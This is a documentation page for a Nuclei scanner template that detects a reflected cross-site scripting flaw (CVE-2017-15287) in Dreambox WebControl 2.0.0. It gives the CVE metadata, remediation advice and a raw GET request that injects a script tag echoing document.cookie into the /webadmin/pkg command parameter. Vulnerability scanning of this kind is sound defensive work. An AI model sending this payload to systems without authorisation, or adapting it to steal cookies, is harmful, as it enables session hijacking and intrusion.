Skip to content
Nuclei Templates

Dreambox WebControl 2.0.0 - Cross-Site Scripting

ID: CVE-2017-15287

Severity: medium

Author: pikpikcu

Tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project

Description

Section titled “Description”

Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the “Name des Bouquets” field, or the file parameter to the /file URI.

YAML Source

Section titled “YAML Source”
id: CVE-2017-15287


info:
  name: Dreambox WebControl 2.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks.
  reference:
    - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf
    - https://www.exploit-db.com/exploits/42986/
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15287
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2017-15287
    cwe-id: CWE-79
    epss-score: 0.00129
    epss-percentile: 0.47671
    cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:*
  metadata:
    max-request: 1
    vendor: bouqueteditor_project
    product: bouqueteditor
    framework: dreambox
  tags: cve,cve2017,dreambox,edb,xss,bouqueteditor_project


http:
  - raw:
      - |
        GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


    matchers:
      - type: word
        words:
          - 'Unknown command: <script>alert(document.cookie)</script>'
# digest: 490a0046304402206f04e6324adec45bd9b84118489c98f9cacba90410c6aa28653506be212acdda02206f5eeffa6bf763c97425b9e5e472ef0d3ae5c17d62c5eb54645429e4d016af5b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-15287.yaml"

View on Github